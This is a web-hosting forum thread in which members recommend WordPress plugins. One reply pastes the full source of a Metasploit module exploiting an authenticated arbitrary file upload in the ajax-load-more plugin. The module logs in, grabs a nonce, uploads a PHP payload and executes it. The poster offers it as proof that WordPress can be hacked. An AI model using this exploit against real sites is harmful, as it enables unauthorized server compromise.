What are your favorite Wordpress Plugins?

aceofadsense

Member
Registered
Joined
Jan 22, 2013
Messages
51
Points
0
Are you running a blog on Wordpress CMS? What are Your favorite Wordpress Plugins that you would recommend to use for better blogging?
 

SIG

Member
Registered
Joined
Oct 16, 2015
Messages
54
Points
0
My favorite WordPress plugins are:

  1. WordFence (Security plugin) - very important plugin.
  2. Jetpack (by WordPress) - good to viewing visitors, search terms, what visitors clicked on, where did they came from, etc. - It also comes with a bunch of handy features.
  3. WPSmush - to reduce image sizes - good for speeding up a little bit your blog/site.
  4. Contact form 7 - good contact form creator.


This is quite it.
 

Hugo E.

Member
Registered
Joined
Sep 8, 2014
Messages
62
Points
0
Hugo E.
According to my personal opinion, WP is already secure why you need a security plugin for it..It's weird.
 

SIG

Member
Registered
Joined
Oct 16, 2015
Messages
54
Points
0
SIG
WordPress has vulnerabilities, and can be hacked. And I can prove it.

This is the most recent one:
WordPress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability

Discovered on: 2015-10-18

Going offtopic with this:
Code:
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
   
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
   
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
     
    register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
   
  def user
    datastore['WP_USER']
  end
   
  def password
    datastore['WP_PASSWORD']
  end
   
  def check
    # Check plugin version
    ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
    if ver
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
   
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
     
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
     
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end
 
    print_status("#{peer} - Trying to upload payload")
     
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
     
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
     
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
 

SenseiSteve

Web Hosting Sensei
Hosting Provider
Registered
Joined
Nov 11, 2015
Messages
273
Points
28
SEO by Yoast
WordFence
Contact Form 7
WP Edit

And yes, WordPress sites get hacked all the time. Keeping your themes and plugins up to date helps, but make sure you download plugins from authority sites and ensure they stay up to date with the current version of WordPress.
 

ulterios

Well-known member
Registered
Joined
Nov 25, 2015
Messages
481
Points
0
It all depends on the site in some cases, but in general here are my favorites:

WordFence Security - Lots of good features and has a cache option which actually works real well

Slider Captcha - Keeps bots from trying to login to my site as well as eliminate spam

Google Analytics Dashboard for WP - To keep track of traffic and visitors

All In One SEO Pack - A lot of good stuff to make some SEO tasks easier.
 

Ron Killian

Well-known member
Registered
Joined
Dec 3, 2015
Messages
363
Points
0
I agree Wordpress can be hacked. Anything can be hacked. Though most people who own wordpress have NO clue how many times each day people (bots) try to break in. Until you have a good security plugin, then you see what the bad guys are trying to do.

I put in another vote for Wordfence, great plugin.

Tried several image compression plugins, but best I found was Kraken. Works great.

Also like Intense Wordpress plugin. Ton's of shortcodes to dress up my content very nicely.

Disqus for comments.

As Ulterios said, Google analytics dashboard is nice.

MCE table button, gotta have tables.

Premium SEO pack - for obvious reasons.

Q2W3 Fixed Widget - Fixes widgets you want to stay in the sidebar as people scroll.

Simple Page Sidebars - Make custom sidebars and any post or page.

Uber Menu for better menu's, bigger, ect.

Wp Author Box - Much better author box.

WP Ad Pro to rotate ads and banners, track ad stats.

Just started using Zendesk for support. Think I like it. Can't say 100% yet. But there are not many good support plugins out there.

Woocommerce and many related plug-ins for it.
 

dnapick

New member
Registered
Joined
Jan 22, 2016
Messages
2
Points
0
It depends on a project but I always use;

SEo by Yoast
Custom CSS
WP Super Cache
 
Newer Threads
Recommended Threads
Replies
1
Views
2,120
Replies
3
Views
2,699
Replies
2
Views
979
Similar Threads

Latest Hosting OffersNew Reviews

Sponsors

Tag Cloud

You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an alternative browser.

Top